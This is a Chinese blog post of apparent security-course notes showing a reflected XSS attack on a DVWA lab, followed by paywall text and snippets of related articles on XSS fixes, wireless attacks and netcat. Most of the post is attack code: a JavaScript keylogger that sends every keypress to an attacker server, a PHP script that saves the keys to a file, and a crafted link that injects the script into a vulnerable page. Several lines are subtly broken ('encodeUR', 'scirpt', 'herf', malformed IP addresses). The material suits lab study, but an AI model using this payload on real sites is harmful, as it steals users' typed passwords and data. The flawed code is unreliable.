【安全牛学习笔记】​XSS- 键盘记录器和反射型XSS

最新推荐文章于 2024-11-15 16:30:56 发布
最新推荐文章于 2024-11-15 16:30:56 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 信息安全 文章标签: 安全 Security+ 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/edu_aqniu/article/details/78142963
本文介绍了如何设置一个键盘记录器,并利用反射型XSS进行攻击。首先,通过创建js文件监听键盘输入并发送到服务器,然后在PHP端将数据保存到文件。接着,展示了如何构造一个链接触发XSS攻击,同时提到了XSSer工具的使用方法和一些高级选项,如HTTP请求配置、编码绕过和特殊注入技巧。此外,还讨论了Security+认证在信息安全领域的价值和火爆原因。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS                        

Keylogger.js 

document.onkeypress = function(evt){ 

    evt = evt || window.event

    key = String.fromCharCode(evt.charCode)

    if(key){

        var http = new XMLHttpRequest();

        var param = encodeUR(key);

        http.open("POST","http://192.168.20.8/keylogger.php",true);               

        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

        http.send("key="+param);

    }                                                           

root@R:~# service apache2 start

root@R:~# cd /var/www/html/

root@R:/var/www/html# gedit keylogger.js

document.onkeypress = function(evt){

    evt = evt || window.event

    key = String.fromCharCode(evt.charCode)

    if(key){

        var http = new XMLHttpRequest();

        var param = encodeUR(key);

        http.open("POST","http://192.168.20.8/keylogger.php",true);

        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

        http.send("key="+param);

    }

}

XSS                                                               

Keylogger.php                                                              <?php                                                       

    $key=$_POST['key'];                                               

    $logfile="keylog.txt";                                             

    $fp = fopen($logfile,"a");                                         

    fwrite($fp,$key);                                                 

    fclose($fp);                                                    

    ?>                                                           

<scirpt+src="http://1.1.1.1/keylogger.js"></script>                     

<a                                                                

herf="http://192.168.20.10/dvwa/vulnerabilites/xss_r/?name=<script+src='

http://192.168.1.20.8/keylogger.js'></script>">xss</a>

root@R:/var/www/html# gedit keylogger.php

    <?php

    $key=$_POST['key'];

    $logfile="keylog.txt";

    $fp = fopen($logfile,"a");

    fwrite($fp,$key);

    fclose($fp);

    ?>

root@R:/var/www/html# gedit keylogger.txt

root@R:/var/www/html# ls

index.html  keylogger.js  keylogger.php  keylog.txt

root@R:/var/www/html# chmod 777 keylog.txt

root@R:/var/www/html# gedit a.html

<a herf="http://192.168.1.107/dvwa/vulnerabilites/xss_r/?name=<script+src='http://192.168.1.1.102/keylogger.js'></script>">xss</a>


XSS                                                               

Xsser                                                              

    命令/图形化 工具                                                 

    绕过服务器端输入筛选                                              
最低0.47元/天 解锁文章

200万优质内容无限畅学
解决反射型XSS漏洞攻击
weixin_30466953的博客
03-03 4757
对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台。 一、首先从前端考虑过滤一些非法字符。 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天panel前 进行过滤Input输入内容 1 // 过滤XSS反射型漏洞 2 filterInputTxt: function (html) ...
安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1737
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
数据包注入重放工具aireplay-ng
12-04 423
数据包注入重放工具aireplay-ng aireplay-ng是aircrack-ng组件包的一个工具。它可以注入重放数据帧,用于后期的WEP、WPA-PSK破解。它提供九种攻击模式,包括死亡...
反射型xss解决方法,增加过滤器,防止反射型 XSS攻击漏洞
wuli_qiyou的博客
01-17 4666
web.xml配置 <filter> <filter-name>XSSFilter</filter-name> <filter-class>com.xxx.filter.NewXssFilter</filter-class> </filter> <filter-mapping> <filter-name>XSSFilter</filter-name> <url
漏洞修复-反射型XSS【中危】
最新发布
weixin_46247049的博客
11-15 1228
工作中渗透测试检测出,反射型XSS漏洞进行修复的记录。使用过滤器即可修复。
kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser
weixin_43239236的博客
01-23 517
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 反射型漏洞利用 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali    客户端 启动apache2服务:service apache2 start 语法: <script src="http://192.168.1.127/keylogger.js"></script> keylogger.js 键盘记录器 需要修改里面的接受地址 document.onkeypress = function(ev
反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3219
XSS反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储型>反射型>D...
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5807
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
XSS漏洞检测利用
2301_80127209的博客
04-25 2171
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
反射型XSS漏洞的条件+类型+危害+解决
gb4215287的博客
02-04 4056
XSS攻击需要具备两个条件:需要向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。 XSS攻击有2种: 反射型攻击; 存储型攻击 XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性持久性,比较常见场景是在博客,论坛、OA、CRM等社交...
sslh:应用协议多路复用器(例如,在同一端口上共享SSHHTTPS)
02-20
sslh-ssl / ssh多路复用器 sslh接受指定端口上的连接,并根据对远程客户端发送的第一个数据包执行的测试进一步转发它们。 实现了针对HTTP,TLS / SSL(包括SNIALPN),SSH,OpenVPN,tinc,XMPP,SOCKS5的探针,并且可以识别可以使用正则表达式测试的任何其他协议。 一个典型的用例是允许在端口443上提供多种服务(例如,从公司防火墙内部连接到SSH,几乎从不阻止端口443),同时仍在该端口上提供HTTPS。 因此, sslh充当协议多路分解器或配电盘。 使用SNIALPN探针,它可以很好地成为托管在单个IP地址后面的虚拟主机场的前端。 sslh具有成熟的守护程序所sslh :特权功能下降,inetd支持,systemd支持,透明代理,chroot,日志记录,IPv4IPv6,基于fork基于select的模型等等。 安装 请参考。
WPA攻击
qq_37759106的博客
02-26 722
WPA PSK攻击                       只有一种密码破解方法                  WPA不存在WEP的弱点            只能暴力破解                          CPU资源                           时间                              字典质量                ...
[ 笔 记 ] NETCAT传输文件/端口扫描/硬盘克隆
qq_40636259的博客
07-01 321
NC{ 传输文件/目录 A: nc -lp 333 > 1.mp4 B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 OR A: nc -q 1 -lp 333 < a.mp4 B: nc -nv 1.1.1.1 333 > 2.mp4 A: tar -cvf - [dir] | nc -lp 333 -q 1 B: nc -nv 1.1.1.1 333...
Sockstress:新而有效的DoS(拒绝服务)攻击
Purpleendurer@优快云
10-15 3828
Sockstress: A new and effective DoS attackSockstress:新而有效的DoS(拒绝服务)攻击 Author: Michael Kassner作者:Michael Kassner 翻译:endurer,2008-10-15 第1版 Category: security, Infrastructure类别:安全,基础设施 T
Aircrack-ng官方文档翻译[中英对照]---Aireplay-ng
平凡之路
02-11 5891
Aircrack-ng官方文档翻译---Aireplay-ng[90%] 本文由优快云-蚍蜉撼青松【主页:http://blog.youkuaiyun.com/howeverpf】整理翻译,欢迎转载,但请务必注明出处!   Description【简介】   Aireplay-ng is used to inject frames.         Aireplay-ng 是一个用来(向网络中)...
解的思路、身份认证方法、密码破解方法、字典
分享学习网络的点点滴滴
09-05 282
目标系统实施了强安全措施安装了所有补丁无任何已知漏洞无应用层漏洞攻击面最小化社会工程学获取目标系统用户身份非授权用户不受信,认证用户可以访问守信资源已有用户账号权限受限,需要提权不会触发系统报警证明你是你声称你是那个人你知道什么(账号密码,pin,passphrase)你有什么(令牌、token、key、证书、密保、手机)你是谁(指纹、视网膜、虹膜、掌纹、声纹、面部识别)以上方法结合使用(多因素身份认证)基于互联网的身份验证仍以账号密码为主要形式人工猜解垃圾桶工程。
无线攻击 --aircrack-ng套件之一:Aireplay-NG(将数据包注入无线网络生成流量工具 / 解除认证DOS攻击,强制用户二次身份验证)
Kevin's Blog
03-05 6031
文章目录一、用法概述二、命令格式三、用法示例3.1 注入质量测试3.2 强制取消用户身份验证攻击3.3 虚假身份验证 一、用法概述   aireplay-ng是aircrack-ng的套件之一,用于注入无线帧,主要作用是产生流量,以便后续用aircrack-ng来对WPA-PSK进行破解,Aireplay-ng有许多攻击可以解除无线客户端的攻击,以捕获WPA握手数据,虚假身份认证,交互式数据包重放...
spring boot 2.x解决反射性xss
虫二
07-22 2154
spring boot 2.x解决反射性xss
Aircrack-ng之Aireplay-ng命令
热门推荐
HoukChen的博客
08-30 2万+
描述aireplay-ng是一个注入帧的工具。它的主要作用是产生数据流量,而这些随后将会被用于aircrack-ng破解WEPWPA/WPA2秘钥。aireplay-ng里包含了很多种不同的攻击方式用来获取WPA握手包。如:解除认证攻击(-0)、伪造认证攻击(-1)、交互式数据包重放攻击(-2)、手动ARP请求注入攻击(-3)、ARP请求重放注入攻击(-4)。而且,通过与packetforge-n
XSS-Codec工具:安全XSS代码转换解决方案
- **兼容性**:对于不同的浏览器平台,XSS-Codec能够确保一致的处理效果。 - **可扩展性**:可以根据实际的业务需求,扩展编码转换的规则库。 #### 关于文件名称 - **codec.hta**:此文件可能为XSS-Codec工具的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值